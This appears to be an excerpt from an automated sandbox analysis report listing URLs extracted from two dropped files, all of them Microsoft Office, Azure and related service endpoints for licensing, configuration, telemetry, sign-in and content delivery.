Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.aadrm.com
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.aadrm.com/
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.addins.omex.office.net/api/addins/search
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.cortana.ai
Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.microsoftstream.com
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://api.office.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.onedrive.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.scheduler.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://augloop.office.com
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://augloop.office.com/v2
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.entity.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://config.edge.skype.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cortana.ai
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cortana.ai/api
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cr.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://d.docs.live.net
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dev.cortana.ai
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://devnull.onenote.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://directory.services.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ecs.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.ppe.windows.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.windows.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.windows.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://invites.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://lifecycle.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.microsoftonline.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.microsoftonline.com/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows.local
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://make.powerautomate.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://management.azure.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://management.azure.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.action.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.engagement.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.lifecycle.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://my.microsoftpersonalcontent.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ncus.contentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officeapps.live.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
